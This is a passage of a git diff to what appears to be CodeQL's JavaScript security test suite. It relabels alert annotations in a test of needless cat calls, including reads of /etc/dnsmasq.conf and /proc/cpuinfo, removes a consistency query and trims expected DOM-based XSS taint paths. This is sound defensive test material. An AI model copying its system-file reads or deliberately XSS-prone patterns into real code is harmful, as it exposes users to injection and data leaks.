${outFile}`); // OK +execSync(`cat ${files.join(' ')} > ${outFile}`); -execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY] +execSync(`cat ${files.join(' ')}`); // $ SPURIOUS: Alert - not just a simple file read exec("cat /proc/cpuinfo | grep name"); // OK - pipes execSync(`cat ${newpath} | ${othertool}`); // OK - pipes function cat(file) { - return execSync('cat ' + file).toString(); // NOT OK + return execSync('cat ' + file).toString(); // $ Alert } -execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY] +execSync("sh -c 'cat " + newpath + "'"); // $ MISSING: Alert var execFile = child_process.execFile; var execFileSync = child_process.execFileSync; -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used. +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK - stderr is used. console.log(stderr); }); -execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ]); // $ Alert var opts = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], opts); // $ Alert var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // $ Alert -execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // $ Alert -execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK. +execSync('cat /proc/cpuinfo' + foo).toString(); // $ Alert -execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK +execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // $ Alert execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK +exec("cat foo/bar", (err, out) => doSomethingWith(out)); // $ Alert execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options. @@ -118,13 +118,13 @@ spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (B cat.stdout.on('end', () => res.end()); })(); -var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK +var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); console.log(notDead); (function () { - var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert someCall( exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess. @@ -133,34 +133,34 @@ console.log(notDead); return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess. })(); -const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK. +const stdout2 = execSync('cat /etc/dnsmasq.conf', { // $ Alert encoding: 'utf8' }); -exec('/bin/cat', function (e, s) {}); // OK +exec('/bin/cat', function (e, s) {}); -spawn("cat") // OK +spawn("cat") var shelljs = require("shelljs"); -shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert let cspawn = require('cross-spawn'); -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar']); // NOT OK -cspawn('cat', (err, out) => {console.log(out)}); // OK -cspawn('cat', { encoding: 'utf8' }); // OK +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar']); // $ Alert +cspawn('cat', (err, out) => {console.log(out)}); +cspawn('cat', { encoding: 'utf8' }); -let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK -let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK +let myResult = cspawn.sync('cat', ['foo/bar']); // $ Alert +let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert var execmod = require('exec'); -execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +execmod("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql deleted file mode 100644 index 87b27a68998c..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.DomBasedXssQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { DomBasedXssFlow::flow(_, result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected index eb46033824f4..de03bca13d4b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected @@ -1,657 +1,241 @@ -nodes -| addEventListener.js:1:43:1:47 | event | semmle.label | event | -| addEventListener.js:2:20:2:24 | event | semmle.label | event | -| addEventListener.js:2:20:2:29 | event.data | semmle.label | event.data | -| addEventListener.js:5:43:5:48 | data | semmle.label | data | -| addEventListener.js:5:43:5:48 | {data} | semmle.label | {data} | -| addEventListener.js:6:20:6:23 | data | semmle.label | data | -| addEventListener.js:10:21:10:25 | event | semmle.label | event | -| addEventListener.js:12:24:12:28 | event | semmle.label | event | -| addEventListener.js:12:24:12:33 | event.data | semmle.label | event.data | -| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | semmle.label | \\u0275getDOM ... ().href | -| angular2-client.ts:26:44:26:69 | this.ro ... .params | semmle.label | this.ro ... .params | -| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:27:44:27:74 | this.ro ... yParams | semmle.label | this.ro ... yParams | -| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:28:44:28:71 | this.ro ... ragment | semmle.label | this.ro ... ragment | -| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | -| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | -| angular2-client.ts:32:46:32:59 | map.get('foo') | semmle.label | map.get('foo') | -| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | semmle.label | this.ro ... 1].path | -| angular2-client.ts:36:44:36:80 | this.ro ... ameters | semmle.label | this.ro ... ameters | -| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | semmle.label | this.ro ... eters.x | -| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | semmle.label | this.ro ... et('x') | -| angular2-client.ts:38:44:38:89 | this.ro ... .params | semmle.label | this.ro ... .params | -| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | semmle.label | this.ro ... arams.x | -| angular2-client.ts:40:44:40:58 | this.router.url | semmle.label | this.router.url | -| angular2-client.ts:42:45:42:59 | this.router.url | semmle.label | this.router.url | -| angular2-client.ts:43:75:43:105 | this.ro ... yParams | semmle.label | this.ro ... yParams | -| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | semmle.label | routeSn ... ('foo') | -| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | semmle.label | Cookie.get("unsafe") | -| angular-tempate-url.js:13:30:13:31 | ev | semmle.label | ev | -| angular-tempate-url.js:14:26:14:27 | ev | semmle.label | ev | -| angular-tempate-url.js:14:26:14:32 | ev.data | semmle.label | ev.data | -| classnames.js:7:31:7:84 | `` | semmle.label | `` | -| classnames.js:7:47:7:69 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:7:58:7:68 | window.name | semmle.label | window.name | -| classnames.js:8:31:8:85 | `` | semmle.label | `` | -| classnames.js:8:47:8:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:8:59:8:69 | window.name | semmle.label | window.name | -| classnames.js:9:31:9:85 | `` | semmle.label | `` | -| classnames.js:9:47:9:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:9:59:9:69 | window.name | semmle.label | window.name | -| classnames.js:10:45:10:55 | window.name | semmle.label | window.name | -| classnames.js:11:31:11:79 | `` | semmle.label | `` | -| classnames.js:11:47:11:64 | unsafeStyle('foo') | semmle.label | unsafeStyle('foo') | -| classnames.js:13:31:13:83 | `` | semmle.label | `` | -| classnames.js:13:47:13:68 | safeSty ... w.name) | semmle.label | safeSty ... w.name) | -| classnames.js:13:57:13:67 | window.name | semmle.label | window.name | -| classnames.js:15:31:15:78 | `` | semmle.label | `` | -| classnames.js:15:47:15:63 | clsx(window.name) | semmle.label | clsx(window.name) | -| classnames.js:15:52:15:62 | window.name | semmle.label | window.name | -| classnames.js:17:32:17:79 | `` | semmle.label | `` | -| classnames.js:17:48:17:64 | clsx(window.name) | semmle.label | clsx(window.name) | -| classnames.js:17:53:17:63 | window.name | semmle.label | window.name | -| clipboard.ts:8:11:8:51 | html | semmle.label | html | -| clipboard.ts:8:18:8:51 | clipboa ... /html') | semmle.label | clipboa ... /html') | -| clipboard.ts:15:25:15:28 | html | semmle.label | html | -| clipboard.ts:24:23:24:58 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:29:19:29:54 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:33:19:33:68 | e.origi ... /html') | semmle.label | e.origi ... /html') | -| clipboard.ts:43:15:43:55 | html | semmle.label | html | -| clipboard.ts:43:22:43:55 | clipboa ... /html') | semmle.label | clipboa ... /html') | -| clipboard.ts:50:29:50:32 | html | semmle.label | html | -| clipboard.ts:71:13:71:62 | droppedHtml | semmle.label | droppedHtml | -| clipboard.ts:71:27:71:62 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | -| clipboard.ts:98:15:98:54 | html | semmle.label | html | -| clipboard.ts:98:22:98:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | -| clipboard.ts:99:23:99:26 | html | semmle.label | html | -| custom-element.js:5:26:5:36 | window.name | semmle.label | window.name | -| d3.js:4:12:4:22 | window.name | semmle.label | window.name | -| d3.js:11:15:11:24 | getTaint() | semmle.label | getTaint() | -| d3.js:12:20:12:29 | getTaint() | semmle.label | getTaint() | -| d3.js:14:20:14:29 | getTaint() | semmle.label | getTaint() | -| d3.js:21:15:21:24 | getTaint() | semmle.label | getTaint() | -| dates.js:9:9:9:69 | taint | semmle.label | taint | -| dates.js:9:17:9:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:9:36:9:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:9:36:9:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:11:31:11:70 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:11:42:11:68 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:11:63:11:67 | taint | semmle.label | taint | -| dates.js:12:31:12:73 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:12:42:12:71 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:12:66:12:70 | taint | semmle.label | taint | -| dates.js:13:31:13:72 | `Time i ... time)}` | semmle.label | `Time i ... time)}` | -| dates.js:13:42:13:70 | dateFns ... )(time) | semmle.label | dateFns ... )(time) | -| dates.js:13:59:13:63 | taint | semmle.label | taint | -| dates.js:16:31:16:69 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:16:42:16:67 | moment( ... (taint) | semmle.label | moment( ... (taint) | -| dates.js:16:62:16:66 | taint | semmle.label | taint | -| dates.js:18:31:18:66 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:18:42:18:64 | datefor ... taint) | semmle.label | datefor ... taint) | -| dates.js:18:59:18:63 | taint | semmle.label | taint | -| dates.js:21:31:21:68 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:21:42:21:66 | dayjs(t ... (taint) | semmle.label | dayjs(t ... (taint) | -| dates.js:21:61:21:65 | taint | semmle.label | taint | -| dates.js:30:9:30:69 | taint | semmle.label | taint | -| dates.js:30:17:30:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:30:36:30:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:30:36:30:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:37:31:37:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:37:42:37:82 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:37:77:37:81 | taint | semmle.label | taint | -| dates.js:38:31:38:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:38:42:38:82 | luxon.f ... taint) | semmle.label | luxon.f ... taint) | -| dates.js:38:77:38:81 | taint | semmle.label | taint | -| dates.js:39:31:39:86 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:39:42:39:84 | moment. ... taint) | semmle.label | moment. ... taint) | -| dates.js:39:79:39:83 | taint | semmle.label | taint | -| dates.js:40:31:40:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:40:42:40:82 | dayjs.f ... taint) | semmle.label | dayjs.f ... taint) | -| dates.js:40:77:40:81 | taint | semmle.label | taint | -| dates.js:46:9:46:69 | taint | semmle.label | taint | -| dates.js:46:17:46:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:46:36:46:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:46:36:46:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:48:31:48:90 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:48:42:48:88 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | -| dates.js:48:83:48:87 | taint | semmle.label | taint | -| dates.js:49:31:49:89 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:49:42:49:87 | new Dat ... (taint) | semmle.label | new Dat ... (taint) | -| dates.js:49:82:49:86 | taint | semmle.label | taint | -| dates.js:50:31:50:104 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:50:42:50:102 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | -| dates.js:50:97:50:101 | taint | semmle.label | taint | -| dates.js:54:9:54:69 | taint | semmle.label | taint | -| dates.js:54:17:54:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:54:36:54:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:54:36:54:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:57:31:57:101 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:57:42:57:99 | moment. ... (taint) | semmle.label | moment. ... (taint) | -| dates.js:57:94:57:98 | taint | semmle.label | taint | -| dates.js:59:31:59:87 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:59:42:59:85 | luxon.e ... (taint) | semmle.label | luxon.e ... (taint) | -| dates.js:59:80:59:84 | taint | semmle.label | taint | -| dates.js:61:31:61:88 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:61:42:61:86 | dayjs.s ... (taint) | semmle.label | dayjs.s ... (taint) | -| dates.js:61:81:61:85 | taint | semmle.label | taint | -| dragAndDrop.ts:8:11:8:50 | html | semmle.label | html | -| dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | semmle.label | dataTra ... /html') | -| dragAndDrop.ts:15:25:15:28 | html | semmle.label | html | -| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | semmle.label | e.origi ... /html') | -| dragAndDrop.ts:43:15:43:54 | html | semmle.label | html | -| dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | -| dragAndDrop.ts:50:29:50:32 | html | semmle.label | html | -| dragAndDrop.ts:71:13:71:61 | droppedHtml | semmle.label | droppedHtml | -| dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | -| event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | -| event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | -| jquery.js:2:7:2:40 | tainted | semmle.label | tainted | -| jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | -| jquery.js:4:5:4:11 | tainted | semmle.label | tainted | -| jquery.js:5:13:5:19 | tainted | semmle.label | tainted | -| jquery.js:6:11:6:17 | tainted | semmle.label | tainted | -| jquery.js:7:5:7:34 | "
    " | semmle.label | "
    " | -| jquery.js:7:20:7:26 | tainted | semmle.label | tainted | -| jquery.js:8:18:8:34 | "XSS: " + tainted | semmle.label | "XSS: " + tainted | -| jquery.js:8:28:8:34 | tainted | semmle.label | tainted | -| jquery.js:10:5:10:40 | "" + ... "" | semmle.label | "" + ... "" | -| jquery.js:10:13:10:20 | location | semmle.label | location | -| jquery.js:10:13:10:31 | location.toString() | semmle.label | location.toString() | -| jquery.js:14:19:14:58 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| jquery.js:14:38:14:57 | window.location.hash | semmle.label | window.location.hash | -| jquery.js:15:19:15:60 | decodeU ... search) | semmle.label | decodeU ... search) | -| jquery.js:15:38:15:59 | window. ... .search | semmle.label | window. ... .search | -| jquery.js:16:19:16:64 | decodeU ... ring()) | semmle.label | decodeU ... ring()) | -| jquery.js:16:38:16:52 | window.location | semmle.label | window.location | -| jquery.js:16:38:16:63 | window. ... tring() | semmle.label | window. ... tring() | -| jquery.js:18:7:18:33 | hash | semmle.label | hash | -| jquery.js:18:14:18:33 | window.location.hash | semmle.label | window.location.hash | -| jquery.js:21:5:21:8 | hash | semmle.label | hash | -| jquery.js:21:5:21:21 | hash.substring(1) | semmle.label | hash.substring(1) | -| jquery.js:22:5:22:8 | hash | semmle.label | hash | -| jquery.js:22:5:22:25 | hash.su ... (1, 10) | semmle.label | hash.su ... (1, 10) | -| jquery.js:23:5:23:8 | hash | semmle.label | hash | -| jquery.js:23:5:23:18 | hash.substr(1) | semmle.label | hash.substr(1) | -| jquery.js:24:5:24:8 | hash | semmle.label | hash | -| jquery.js:24:5:24:17 | hash.slice(1) | semmle.label | hash.slice(1) | -| jquery.js:27:5:27:8 | hash | semmle.label | hash | -| jquery.js:27:5:27:25 | hash.re ... #', '') | semmle.label | hash.re ... #', '') | -| jquery.js:28:5:28:26 | window. ... .search | semmle.label | window. ... .search | -| jquery.js:28:5:28:43 | window. ... ?', '') | semmle.label | window. ... ?', '') | -| jquery.js:34:5:34:25 | '' + ... '' | semmle.label | '' + ... '' | -| jquery.js:34:13:34:16 | hash | semmle.label | hash | -| jquery.js:36:25:36:31 | tainted | semmle.label | tainted | -| jquery.js:37:25:37:37 | () => tainted | semmle.label | () => tainted | -| jquery.js:37:31:37:37 | tainted | semmle.label | tainted | -| json-stringify.jsx:5:9:5:36 | locale | semmle.label | locale | -| json-stringify.jsx:5:18:5:36 | req.param("locale") | semmle.label | req.param("locale") | -| json-stringify.jsx:11:51:11:56 | locale | semmle.label | locale | -| json-stringify.jsx:19:56:19:61 | locale | semmle.label | locale | -| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | semmle.label | JSON.st ... locale) | -| json-stringify.jsx:31:55:31:60 | locale | semmle.label | locale | -| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | semmle.label | JSON.st ... jsonLD) | -| jwt-server.js:7:9:7:35 | taint | semmle.label | taint | -| jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| jwt-server.js:9:16:9:20 | taint | semmle.label | taint | -| jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | -| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | -| nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | -| optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | -| optionalSanitizer.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| optionalSanitizer.js:6:18:6:23 | target | semmle.label | target | -| optionalSanitizer.js:8:7:8:22 | tainted | semmle.label | tainted | -| optionalSanitizer.js:8:17:8:22 | target | semmle.label | target | -| optionalSanitizer.js:9:18:9:24 | tainted | semmle.label | tainted | -| optionalSanitizer.js:15:9:15:14 | target | semmle.label | target | -| optionalSanitizer.js:16:18:16:18 | x | semmle.label | x | -| optionalSanitizer.js:17:20:17:20 | x | semmle.label | x | -| optionalSanitizer.js:26:7:26:39 | target | semmle.label | target | -| optionalSanitizer.js:26:16:26:39 | documen ... .search | semmle.label | documen ... .search | -| optionalSanitizer.js:28:24:28:24 | x | semmle.label | x | -| optionalSanitizer.js:29:12:29:12 | x | semmle.label | x | -| optionalSanitizer.js:31:7:31:23 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:31:18:31:23 | target | semmle.label | target | -| optionalSanitizer.js:32:18:32:25 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:34:5:34:36 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | semmle.label | sanitiz ... inted2) | -| optionalSanitizer.js:34:28:34:35 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:36:18:36:25 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:38:7:38:23 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:38:18:38:23 | target | semmle.label | target | -| optionalSanitizer.js:39:18:39:25 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:41:5:41:36 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | semmle.label | sanitiz ... inted3) | -| optionalSanitizer.js:41:28:41:35 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:43:18:43:25 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | semmle.label | sanitiz ... target | -| optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | semmle.label | sanitizeBad(target) | -| optionalSanitizer.js:45:41:45:46 | target | semmle.label | target | -| optionalSanitizer.js:45:51:45:56 | target | semmle.label | target | -| pages/[id].jsx:3:30:3:35 | params [id] | semmle.label | params [id] | -| pages/[id].jsx:3:30:3:35 | params [q] | semmle.label | params [q] | -| pages/[id].jsx:5:9:5:14 | { id } | semmle.label | { id } | -| pages/[id].jsx:5:9:5:29 | id | semmle.label | id | -| pages/[id].jsx:5:18:5:29 | router.query | semmle.label | router.query | -| pages/[id].jsx:10:44:10:45 | id | semmle.label | id | -| pages/[id].jsx:13:44:13:49 | params [id] | semmle.label | params [id] | -| pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | -| pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | -| pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | semmle.label | {\\n ... ,\\n } [id] | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | semmle.label | {\\n ... ,\\n } [q] | -| pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | -| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | -| pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | -| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | semmle.label | context ... r \|\| "" | -| react-native.js:7:7:7:33 | tainted | semmle.label | tainted | -| react-native.js:7:17:7:33 | req.param("code") | semmle.label | req.param("code") | -| react-native.js:8:18:8:24 | tainted | semmle.label | tainted | -| react-native.js:9:27:9:33 | tainted | semmle.label | tainted | -| react-use-context.js:10:22:10:32 | window.name | semmle.label | window.name | -| react-use-context.js:16:26:16:36 | window.name | semmle.label | window.name | -| react-use-router.js:8:21:8:32 | router.query | semmle.label | router.query | -| react-use-router.js:8:21:8:39 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:11:24:11:35 | router.query | semmle.label | router.query | -| react-use-router.js:11:24:11:42 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:23:43:23:54 | router.query | semmle.label | router.query | -| react-use-router.js:23:43:23:61 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:33:21:33:32 | router.query | semmle.label | router.query | -| react-use-router.js:33:21:33:39 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-state.js:4:9:4:49 | state | semmle.label | state | -| react-use-state.js:4:38:4:48 | window.name | semmle.label | window.name | -| react-use-state.js:5:51:5:55 | state | semmle.label | state | -| react-use-state.js:9:9:9:43 | state | semmle.label | state | -| react-use-state.js:10:14:10:24 | window.name | semmle.label | window.name | -| react-use-state.js:11:51:11:55 | state | semmle.label | state | -| react-use-state.js:15:9:15:43 | state | semmle.label | state | -| react-use-state.js:15:10:15:14 | state | semmle.label | state | -| react-use-state.js:16:20:16:30 | window.name | semmle.label | window.name | -| react-use-state.js:17:51:17:55 | state | semmle.label | state | -| react-use-state.js:21:10:21:14 | state | semmle.label | state | -| react-use-state.js:22:14:22:17 | prev | semmle.label | prev | -| react-use-state.js:23:35:23:38 | prev | semmle.label | prev | -| react-use-state.js:25:20:25:30 | window.name | semmle.label | window.name | -| sanitiser.js:16:7:16:27 | tainted | semmle.label | tainted | -| sanitiser.js:16:17:16:27 | window.name | semmle.label | window.name | -| sanitiser.js:23:21:23:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:23:29:23:35 | tainted | semmle.label | tainted | -| sanitiser.js:30:21:30:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:30:29:30:35 | tainted | semmle.label | tainted | -| sanitiser.js:33:21:33:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:33:29:33:35 | tainted | 